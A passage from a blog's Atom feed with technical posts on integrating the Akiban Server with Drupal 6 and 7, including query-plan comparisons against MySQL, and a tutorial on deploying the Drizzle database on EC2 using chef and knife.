&lt;p&gt;Drupal 6 does not have a database abstraction layer so it is not as easy to integrate Akiban in this case. With Drupal 6, we do not attempt to run all of Drupal on Akiban. What we have done with our existing customers who use Drupal 6 is to send certain problem queries to Akiban (running in our MySQL replication configuration) and everything else to MySQL. The Akiban Server speaks the PostgreSQL protocol as I discussed &lt;a href='http://www.akiban.com/blog/2011/08/29/typical-akiban-deployment'&gt;before&lt;/a&gt;. Hence, for Drupal 6, we use the PostgreSQL database driver to talk to Akiban.&lt;/p&gt;

&lt;p&gt;Since Drupal 6 does not support speaking to multiple different database backends at the same time, we apply a &lt;a href='https://gist.github.com/2710166'&gt;patch&lt;/a&gt; to get started. Basically, this patch allows connections to be open to both an existing MySQL server and the Akiban Server at the same time. It could be used to do the same with a PostgreSQL database as well.&lt;/p&gt;

&lt;p&gt;Once that patch is applied, to send a query to Akiban, the active database connection is set to Akiban and a query is fired off for the Akiban Server to execute. The following code snippet shows an example.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;if ($this-&amp;gt;use_akiban) {&lt;/span&gt;
&lt;span class='x'&gt;   db_set_active(&amp;#39;akiban&amp;#39;);&lt;/span&gt;
&lt;span class='x'&gt;   $result = db_query_range($query, &lt;/span&gt;
&lt;span class='x'&gt;                            $args, &lt;/span&gt;
&lt;span class='x'&gt;                            $offset, &lt;/span&gt;
&lt;span class='x'&gt;                            $this-&amp;gt;pager[&amp;#39;items_per_page&amp;#39;]);&lt;/span&gt;
&lt;span class='x'&gt;}&lt;/span&gt;
&lt;span class='x'&gt;db_set_active(&amp;#39;default&amp;#39;)&lt;/span&gt;
&lt;span class='x'&gt;if (! $result) { /* if Akiban failed go to regular MySQL */&lt;/span&gt;
&lt;span class='x'&gt;   $result = db_query_range($query, &lt;/span&gt;
&lt;span class='x'&gt;                            $args, &lt;/span&gt;
&lt;span class='x'&gt;                            $offset, &lt;/span&gt;
&lt;span class='x'&gt;                            $this-&amp;gt;pager[&amp;#39;items_per_page&amp;#39;]);&lt;/span&gt;
&lt;span class='x'&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As can be seen in the code above, its also possible to detect if the query failed against Akiban and re-issue it against MySQL.&lt;/p&gt;

&lt;p&gt;When deployed in this configuration, connection details for the Akiban Server is specified in the &lt;code&gt;settings.php&lt;/code&gt; file for a Drupal site.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;$db_url = array(&lt;/span&gt;
&lt;span class='x'&gt;  &amp;quot;default&amp;quot; =&amp;gt; &amp;quot;mysql://drupal:drupal@mysql_hostname/drupal_schema&amp;quot;,&lt;/span&gt;
&lt;span class='x'&gt;  &amp;quot;akiban&amp;quot;  =&amp;gt; &amp;quot;pgsql://drupal:drupal@akiban_hostname:15432/drupal_schema&amp;quot;&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We&amp;#8217;ve also done some work with clients where we have made patches to the Views module for Drupal. These patches allow a client to send the queries generated by a specific view to an Akiban Server.&lt;/p&gt;

&lt;p&gt;Taken together, this makes it quite easy for us to work with Drupal 6 and send problematic queries to Akiban.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Akiban Server Progress with Drupal 7</title>
   <link href="http://posulliv.github.com/2012/05/14/drupal-akiban"/>
   <updated>2012-05-14T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/05/14/drupal-akiban</id>
   <content type="html">&lt;p&gt;The call for papers for &lt;a href='http://munich2012.drupal.org/'&gt;DrupalCon Munich&lt;/a&gt; closed on Friday and I &lt;a href='http://munich2012.drupal.org/program/sessions/building-new-database-driver-drupal-7'&gt;submitted&lt;/a&gt; a session related to the work I&amp;#8217;m doing on developing a database module for the Akiban Server with Drupal 7. That work has not been open sourced yet but will be before August. We also plan on open sourcing and releasing the Akiban Server for public download by August as well. The end result of this work will be a database driver for the Akiban Server that will allow Drupal 7 to run on Akiban.&lt;/p&gt;

&lt;p&gt;In this post, I wanted to briefly show the type of results I&amp;#8217;ve been seeing from running Drupal on Akiban. To do this, I constructed a simple view using the Views module and benchmarked the query that resulted from this view.&lt;/p&gt;

&lt;h1 id='environment_setup'&gt;Environment Setup&lt;/h1&gt;

&lt;p&gt;All results were gathered on EC2 instances. The base AMI used for these results is an official AMI of Ubuntu 10.04 provided by &lt;a href='http://cloud-images.ubuntu.com/releases/10.04/release'&gt;Canonical&lt;/a&gt;. The particular AMI used as the base image for the results gathered in this post was &lt;a href='https://console.aws.amazon.com/ec2/home?region=us-east-1#launchAmi=ami-0baf7662'&gt;ami-0baf7662&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Images used were all launched in the US-EAST-1A availability zone and were large instance types. After launching this base image I installed MySQL 5.6 and Drupal 7.12. The steps I took to install these components along with the &lt;code&gt;my.cnf&lt;/code&gt; file I used for MySQL are outlined in this &lt;a href='https://gist.github.com/2691521'&gt;gist&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;I also created an AMI from the running instance after all the steps outlined were performed. This &lt;a href='https://console.aws.amazon.com/ec2/home?region=us-east-1#launchAmi=ami-2eef4a47'&gt;AMI&lt;/a&gt; has MySQL 5.6 installed along with Drupal 7.12 and data generated with drush.&lt;/p&gt;

&lt;p&gt;The Akiban AMI cannot be made available for general download yet since we have not open-sourced our stack as of this time. Once our stack has been open-sourced I will update this post with a link to an AMI that can be downloaded. However, if you are interested in seeing the results here for yourself, feel free to contact me and I should be able to grant access to an EC2 instance for testing.&lt;/p&gt;

&lt;h2 id='data_generation'&gt;Data Generation&lt;/h2&gt;

&lt;p&gt;I used &lt;a href='http://drupal.org/project/drush'&gt;drush&lt;/a&gt; and the &lt;a href='http://drupal.org/project/devel'&gt;devel&lt;/a&gt; modules to generate data so the view would be operating on some data. I generated the following data:&lt;/p&gt;
&lt;table&gt;
  &lt;tr&gt;
    &lt;td&gt;users&lt;/td&gt;&lt;td&gt;50000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;tags&lt;/td&gt;&lt;td&gt;1000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;vocabularies&lt;/td&gt;&lt;td&gt;5000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;menus&lt;/td&gt;&lt;td&gt;5000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;nodes&lt;/td&gt;&lt;td&gt;100000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;max comments per node&lt;/td&gt;&lt;td&gt;10&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;h1 id='view_and_sql_query'&gt;View and SQL Query&lt;/h1&gt;

&lt;p&gt;I created a simple view that filters and sorts on content criteria. A screenshot of my view construction page can be seen &lt;a href='/images/view_screen_shot.png'&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The resulting SQL query that gets executed by this view is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;&lt;span class='k'&gt;SELECT&lt;/span&gt; &lt;span class='k'&gt;DISTINCT&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;title&lt;/span&gt;                            &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;node_title&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt;                              &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;nid&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;comment_count&lt;/span&gt; &lt;span class='k'&gt;AS&lt;/span&gt; 
                &lt;span class='n'&gt;node_comment_statistics_comment_count&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;created&lt;/span&gt;                          &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;node_created&lt;/span&gt; 
&lt;span class='k'&gt;FROM&lt;/span&gt;   &lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt; 
       &lt;span class='k'&gt;INNER&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt; 
         &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; 
&lt;span class='k'&gt;WHERE&lt;/span&gt;  &lt;span class='p'&gt;((&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;1&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='k'&gt;comment&lt;/span&gt; &lt;span class='k'&gt;IN&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;2&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;&amp;gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;111&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;comment_count&lt;/span&gt; &lt;span class='o'&gt;&amp;gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;2&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='p'&gt;))&lt;/span&gt;
&lt;span class='k'&gt;ORDER&lt;/span&gt;  &lt;span class='k'&gt;BY&lt;/span&gt; &lt;span class='n'&gt;node_created&lt;/span&gt; &lt;span class='k'&gt;ASC&lt;/span&gt; 
&lt;span class='k'&gt;LIMIT&lt;/span&gt;  &lt;span class='mi'&gt;50&lt;/span&gt; &lt;span class='k'&gt;offset&lt;/span&gt; &lt;span class='mi'&gt;0&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='performance_comparison'&gt;Performance Comparison&lt;/h1&gt;

&lt;p&gt;The response time of the query in Akiban versus MySQL is shown below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/drupal_view_response_time.png' alt='Reponse time comparison.' /&gt;
&lt;/div&gt;
&lt;p&gt;As seen in the image above, Akiban can execute the query in question in 5 ms or less whereas MySQL consistently takes 1200 ms to execute the query. In the next section I&amp;#8217;ll go into details of how Akiban executes this query.&lt;/p&gt;

&lt;p&gt;Secondly, numbers were obtained using the mysqlslap benchmark tool from MySQL to demonstrate how Akiban performs versus MySQL with varying degrees of concurrency.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/drupal_view_throughput.png' alt='Throughput comparison.' /&gt;
&lt;/div&gt;
&lt;h1 id='mysql_execution_plan'&gt;MySQL Execution Plan&lt;/h1&gt;

&lt;p&gt;Using Maatkit to visualize the MySQL execution plan, we get:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;JOIN
+- Filter with WHERE
|  +- Bookmark lookup
|     +- Table
|     |  table          node_comment_statistics
|     |  possible_keys  PRIMARY,comment_count
|     +- Unique index lookup
|        key            node_comment_statistics-&amp;gt;PRIMARY
|        possible_keys  PRIMARY,comment_count
|        key_len        4
|        ref            drupal.node.nid
|        rows           1
+- Table scan
   +- TEMPORARY
      table          temporary&lt;span class='o'&gt;(&lt;/span&gt;node&lt;span class='o'&gt;)&lt;/span&gt;
      +- Filter with WHERE
         +- Bookmark lookup
            +- Table
            |  table          node
            |  possible_keys  PRIMARY,node_status_type
            +- Index scan
               key            node-&amp;gt;node_created
               possible_keys  PRIMARY,node_status_type
               key_len        4
               rows           100
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;MySQL chooses to start from the node table and scans an index on the created column. A temporary table is then created in memory to store the results of this index scan. The items stored in the temporary table are then processed to eliminate duplicates (for the DISTINCT). For each distinct row in the temporary table, MySQL then performs a join to the &lt;code&gt;node_comment_statistics&lt;/code&gt; table by performing an index lookup using its primary key.&lt;/p&gt;

&lt;h1 id='akiban_execution_plan'&gt;Akiban Execution Plan&lt;/h1&gt;

&lt;p&gt;The tables involved in the query fall into a single table group in Akiban - the node group. Grouping is explained by our CTO in this &lt;a href='http://www.akiban.com/blog/2011/04/18/grouping_explained'&gt;post&lt;/a&gt; and that post includes a grouping for Drupal where you can see the node group. For this query, it means all joins within the node group are executed with essentially zero cost. It also allows for the creation of Akiban group indexes. A group index is an index that can span multiple tables along a single branch within a table group.&lt;/p&gt;

&lt;p&gt;A covering group index for this query is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;CREATE INDEX cvr_gi ON node
&lt;span class='o'&gt;(&lt;/span&gt;
  node.status,
  node.comment,
  node.created,
  node.nid,
  node_comment_statistics.comment_count,
  node_comment_statistics.nid,
  node.title
&lt;span class='o'&gt;)&lt;/span&gt; USING LEFT JOIN
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Notice that the &lt;code&gt;node.created&lt;/code&gt; column is included in this index so a sort could be avoided.&lt;/p&gt;

&lt;p&gt;The other large advantage Akiban brings when executing this query is the query optimizer is intelligent enough to determine that the DISTINCT is not required in the query due to the 1-to-1 mapping between &lt;code&gt;node&lt;/code&gt; and &lt;code&gt;node_comment_statistics&lt;/code&gt; and the fact that an INNER JOIN is being performed between these 2 tables.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;Limit_Default&lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;limit&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;50: project&lt;span class='o'&gt;([&lt;/span&gt;Field&lt;span class='o'&gt;(&lt;/span&gt;6&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;3&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;2&lt;span class='o'&gt;)]))&lt;/span&gt;
  project&lt;span class='o'&gt;([&lt;/span&gt;Field&lt;span class='o'&gt;(&lt;/span&gt;6&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;3&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;2&lt;span class='o'&gt;)])&lt;/span&gt;
    Select_HKeyOrdered&lt;span class='o'&gt;(&lt;/span&gt;Index&lt;span class='o'&gt;(&lt;/span&gt;cvr_gi&lt;span class='o'&gt;(&lt;/span&gt;BoolLogic&lt;span class='o'&gt;(&lt;/span&gt;AND -&amp;gt; Field&lt;span class='o'&gt;(&lt;/span&gt;3&lt;span class='o'&gt;)&lt;/span&gt; &amp;gt;&lt;span class='o'&gt;=&lt;/span&gt; Literal&lt;span class='o'&gt;(&lt;/span&gt;111&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt; &amp;gt;&lt;span class='o'&gt;=&lt;/span&gt; Literal&lt;span class='o'&gt;(&lt;/span&gt;2&lt;span class='o'&gt;)&lt;/span&gt; -&amp;gt; BOOL&lt;span class='o'&gt;))&lt;/span&gt;
      IndexScan_Default&lt;span class='o'&gt;(&lt;/span&gt;Index&lt;span class='o'&gt;(&lt;/span&gt;cvr_gi&lt;span class='o'&gt;(&lt;/span&gt;&amp;gt;&lt;span class='o'&gt;=&lt;/span&gt;UnboundExpressions&lt;span class='o'&gt;[&lt;/span&gt;Literal&lt;span class='o'&gt;(&lt;/span&gt;1&lt;span class='o'&gt;)&lt;/span&gt;, Literal&lt;span class='o'&gt;(&lt;/span&gt;2&lt;span class='o'&gt;)]&lt;/span&gt;,&amp;lt;&lt;span class='o'&gt;=&lt;/span&gt;UnboundExpressions&lt;span class='o'&gt;[&lt;/span&gt;Literal&lt;span class='o'&gt;(&lt;/span&gt;1&lt;span class='o'&gt;)&lt;/span&gt;, Literal&lt;span class='o'&gt;(&lt;/span&gt;2&lt;span class='o'&gt;)]))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above execution plan is in the Akiban format. In this format, you read the plan like a tree so we start from the leaf nodes. The above plan starts with a scan of the &lt;code&gt;cvr_gi&lt;/code&gt; index using the &lt;code&gt;node.status&lt;/code&gt; and &lt;code&gt;node.comment&lt;/code&gt; predicates. It then filters rows from this scan (the &lt;code&gt;Select_HKeyOrdered&lt;/code&gt; operator performs this filtering) before limiting the results to the size of the result set requested.&lt;/p&gt;

&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;To wrap up, I briefly showed some of the performance benefits we are seeing when running Drupal 7 on the Akiban Server. In the not too distant future, we will be open sourcing our stack here at Akiban and providing downloads of the Akiban Server. I will also be making the database driver for the Akiban Server for Drupal 7 available for download on drupal.org once its complete.&lt;/p&gt;

&lt;p&gt;If you are interested in trying this out yourself or want to verify the results before this work becomes publically available, feel free to contact me and I should be able to set you up with access to an EC2 instance so you try if for yourself.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Deploy Drizzle on EC2 with chef</title>
   <link href="http://posulliv.github.com/2011/04/07/drizzle-chef"/>
   <updated>2011-04-07T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2011/04/07/drizzle-chef</id>
   <content type="html">&lt;p&gt;
This post is a tutorial on how to deploy Drizzle on an EC2 instance using chef and the &lt;a href=&quot;http://www.opscode.com/platform/&quot;&gt;Opscode Chef&lt;/a&gt; platform. The tutorial is specifically targetted at Ubuntu platforms. In particular, the procedures outlined here have only been tested on Ubuntu 10.04. It is expected however that the instructions here should apply on other Ubuntu versions with minimal modifications needed.
&lt;/p&gt;

&lt;h2&gt;The Opscode Platform&lt;/h2&gt;

&lt;p&gt;
In this article, we'll use the Opscode platform since it provides an easy way for anyone to get started with chef. If you are a new user, proceed to &lt;a href=&quot;https://community.opscode.com/users/new&quot;&gt;sign up&lt;/a&gt; for a new account. Once you are signed up, the next step is to create a new organization. For this article, I'm going to create an organization named drizzle-test. Once your organization is created, you should see the organization in your list of organizations when you click on the Organizations link at the top right of the opscode console. My view looks like (you should be able to click on the image to see a larger version):
&lt;/p&gt;

&lt;img src=&quot;/images/console_orgs.png&quot; width=750 /&gt;

&lt;h2&gt;Configure AWS&lt;/h2&gt;

&lt;p&gt;
An assumption made in this article is that you have an &lt;a href=&quot;http://aws.amazon.com/&quot;&gt;AWS&lt;/a&gt; account. If you don't, signing up is relatively straightforward.
&lt;/p&gt;

&lt;p&gt;
There are a few items that need to be configured for EC2 that we need to do to make our lives easier before starting with chef. Amazon blocks all incoming traffic to EC2 instances by default. SSH is used by chef to access and bootstrap a newly created instance. We want to allow SSH traffic to our EC2 instances and for this article, I want to permit traffic to the drizzle port (default drizzle port is 4427) as well. This is accomplished using the AWS console. We need to configure Security Groups. You can either create a new security group and modify the default security group. For this article, I'll create a new security group named drizzle and add the appropriate rules. After creating the group and adding the rules, the security group details should look like:
&lt;/p&gt;

&lt;img src=&quot;/images/security_group.png&quot; width=750 /&gt;

&lt;p&gt;
I'll also create a new key pair in the AWS console specifically for this article. I'm going to give this key pair the name drizzle. After creating the key pair, I copy the downloaded private key to my SSH folder and update permissions on the key:
&lt;/p&gt;

&lt;pre&gt;
mv ~/Downloads/drizzle.pem ~/.ssh/
chmod 600 ~/.ssh/drizzle.pem
&lt;/pre&gt;

&lt;h2&gt;Install chef&lt;/h2&gt;

&lt;p&gt;
To install chef on Ubuntu is quite straightforward. Opscode maintains an APT repository which I simply need to add to my sources list. In the file &lt;code&gt;/etc/apt/sources.list.d/opscode.list&lt;/code&gt;, add (and replace lucid with whatever release you are running):
&lt;/p&gt;

&lt;pre&gt;
deb http://apt.opscode.com/ lucid main
&lt;/pre&gt;

&lt;p&gt;
Next, I need to add the GPG key:
&lt;/p&gt;

&lt;pre&gt;
wget -qO - http://apt.opscode.com/packages@opscode.com.gpg.key | sudo apt-key add -
sudo apt-get update
&lt;/pre&gt;

&lt;p&gt;
To install chef, its as simple as installing the chef package:
&lt;/p&gt;

&lt;pre&gt;
sudo apt-get install chef
&lt;/pre&gt;

&lt;p&gt;
When prompted for the server URL during this package installation, you can leave it blank. We will be configuring this later. You can also stop and disable the chef-client service now if you wish since we will only be using the &lt;code&gt;knife&lt;/code&gt; utility in this article. Finally, verify the version you have installed:
&lt;/p&gt;

&lt;pre&gt;
knife -v
&lt;/pre&gt;

&lt;p&gt;
For this article, the output of the above command needs to be a least 0.9.14
&lt;/p&gt;

&lt;p&gt;
Other packages required for this article are rubygems and git:
&lt;/p&gt;

&lt;pre&gt;
sudo apt-get install rubygems git
&lt;/pre&gt;

&lt;p&gt;
Once rubygems is installed, there a few gems required for interacting with EC2:
&lt;/p&gt;

&lt;pre&gt;
sudo gem install net-ssh net-ssh-multi fog highline
&lt;/pre&gt;

&lt;h2&gt;Configure chef&lt;/h2&gt;

&lt;p&gt;
We are now all set to get started. The first thing to do is create a chef repository on your workstation. In this article, I will use git for this:
&lt;/p&gt;

&lt;pre&gt;
git clone https://github.com/opscode/chef-repo.git drizzle-chef-repo
&lt;/pre&gt;

&lt;p&gt;
Create a &lt;code&gt;.chef&lt;/code&gt; directory within this repository. This directory contains all the configuration files for &lt;b&gt;just this&lt;/b&gt; repository:
&lt;/p&gt;

&lt;pre&gt;
mkdir -p ~/drizzle-chef-repo/.chef
&lt;/pre&gt;

&lt;p&gt;
Next, we need to download keys and knife configuration files from the Opscode platform that will be used for interacting with Opscode platform. Keys are needed for both your user and organization on the Opscode Platform. To retrieve your user key (if you did not download it when signing up), click on your username through the console and you will a 'get private key' link on your account page:
&lt;/p&gt;

&lt;img src=&quot;/images/user_key.png&quot; width=750 /&gt;

&lt;p&gt;
After Downloading this key, I need to place it in the configuration directory for the chef repository I am using here:
&lt;/p&gt;

&lt;pre&gt;
mv ~/Downloads/posulliv.pem ~/drizzle-chef-repo/.chef
&lt;/pre&gt;

&lt;p&gt;
For your organization, click on the 'Regenerate validation key' link and 'Generate knife config' link from the organizations over page as mentioned in the first section of this article. After clicking those 2 links, you will have 2 files: 1) drizzle-test-validator.pem and 2) knife.rb. Move these 2 files into the configuration directory for the chef repository being used for this article:
&lt;/p&gt;

&lt;pre&gt;
mv ~/Downloads/drizzle-test-validator.pem ~/drizzle-chef-repo/.chef
mv ~/Downloads/knife.rb ~/drizzle-chef-repo/.chef
&lt;/pre&gt;

&lt;p&gt;
From now on, whenever you are in the &lt;code&gt;drizzle-chef-repo&lt;/code&gt; directory, the &lt;code&gt;knife&lt;/code&gt; utility will connect to the Opscode Platform. To verify this, lets list out the current clients:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife client list
[
  &quot;drizzle-test-validator&quot;
]
posulliv@curragh:~/drizzle-chef-repo$
&lt;/pre&gt;

&lt;p&gt;
We need to tell &lt;code&gt;knife&lt;/code&gt; about our AWS credentials. This is done by adding the following 2 lines to your &lt;code&gt;knife.rb&lt;/code&gt; file in the &lt;code&gt;~/drizzle-chef-repo/.chef&lt;/code&gt; directory:
&lt;/p&gt;

&lt;pre&gt;
knife[:aws_access_key_id]     = &quot;Your AWS Access Key&quot;
knife[:aws_secret_access_key] = &quot;Your AWS Secret Access Key&quot;
&lt;/pre&gt;

&lt;p&gt;
After adding these credentials I should now be able to list all the EC2 instances associated with my AWS account:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife ec2 server list
Instance ID      Public IP        Private IP       Flavor           Image            Security Groups  State          
i-5e1ce433       50.17.249.89     10.253.30.159    m1.large         ami-879f70ee     AkibanWeb        running        
i-1bcb4f77       50.16.188.89     10.112.233.119   t1.micro         ami-548c783d     AkibanWeb        running        
i-d6fa10b9       50.17.34.183     10.243.14.15     m1.large         ami-548c783d     AkibanQA         running        
i-98db31f7       50.16.137.154    10.114.246.151   m1.large         ami-548c783d     AkibanQA         running        
i-1e16fc71       174.129.139.237  10.195.205.139   m1.large         ami-548c783d     AkibanQA         running        
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;h2&gt;Drizzle Cookbook&lt;/h2&gt;

&lt;p&gt;
chef should now be configured to work with your AWS account. The next step is to decide on what roles or recipes you want to apply to an instance you create. Since this article is on drizzle, I'll show how to bootstrap an EC2 instance with drizzle. I have developed a simple drizzle cookbook in a fork of Opscode's official cookbook repository that can be retrieved with git:
&lt;/p&gt;

&lt;pre&gt;
cd ~/drizzle-chef-repo
rm -rf cookbooks
git clone git://github.com/posulliv/cookbooks.git
&lt;/pre&gt;

&lt;p&gt;
I have opened a pull request for this fork to get merged into Opscode's official repository. Hopefully, it will get merged in soon.
&lt;/p&gt;

&lt;p&gt;
Now we want to upload cookbooks to our chef server. The only cookbook I will upload in this article is the Drizzle cookbook:
&lt;/p&gt;

&lt;pre&gt;
cd ~/drizzle-chef-repo
knife cookbook upload drizzle
&lt;/pre&gt;

It is simple to list the cookbooks that have been uploaded so far to your chef server:

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife cookbook list
[
  &quot;drizzle&quot;
]
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;h2&gt;Create and Verify EC2 Instance&lt;/h2&gt;

&lt;p&gt;
We are now ready to create an EC2 instance and have it bootstrap itself and install the drizzle GA release! You will see a spew of output when you issue the command below (feel free to use any AMI image or flavor you wish, I just picked one):
&lt;/p&gt;

&lt;pre&gt;
knife ec2 server create &quot;recipe[drizzle]&quot; \
--image ami-2d4aa444 \
--flavor m1.small \
--groups drizzle \
--ssh-key drizzle \
--identity-file ~/.ssh/drizzle.pem \
--ssh-user ubuntu
&lt;/pre&gt;

&lt;p&gt;
To verify the server is created, first we check in the server list output from EC2:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife ec2 server list
Instance ID      Public IP        Private IP       Flavor           Image            Security Groups  State          
i-5e1ce433       50.17.249.89     10.253.30.159    m1.large         ami-879f70ee     AkibanWeb        running        
i-1bcb4f77       50.16.188.89     10.112.233.119   t1.micro         ami-548c783d     AkibanWeb        running        
i-d6fa10b9       50.17.34.183     10.243.14.15     m1.large         ami-548c783d     AkibanQA         running        
i-98db31f7       50.16.137.154    10.114.246.151   m1.large         ami-548c783d     AkibanQA         running        
i-1e16fc71       174.129.139.237  10.195.205.139   m1.large         ami-548c783d     AkibanQA         running        
i-c03b5caf       50.17.153.76     10.202.253.78    m1.small         ami-2d4aa444     drizzle          running        
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;p&gt;
We should also verify that it is listed as a node:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife node list
[
  &quot;i-c03b5caf&quot;
]
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;p&gt;
Finally, if I log onto the EC2 instance I should be able to connect to drizzle:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~$ ssh -i ~/.ssh/drizzle.pem ubuntu@50.17.153.76
Linux ip-10-116-210-131 2.6.32-305-ec2 #9-Ubuntu SMP Thu Apr 15 04:14:01 UTC 2010 i686 GNU/Linux
Ubuntu 10.04 LTS

Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Apr 11 23:01:28 UTC 2011

  System load: 0.36             Memory usage: 13%   Processes:       55
  Usage of /:  8.6% of 9.92GB   Swap usage:   0%    Users logged in: 0

  Graph this data and manage this system at https://landscape.canonical.com/
